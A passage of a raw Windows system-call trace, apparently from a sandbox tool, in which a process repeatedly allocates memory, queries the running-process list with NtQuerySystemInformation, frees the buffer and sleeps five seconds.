ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.490] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 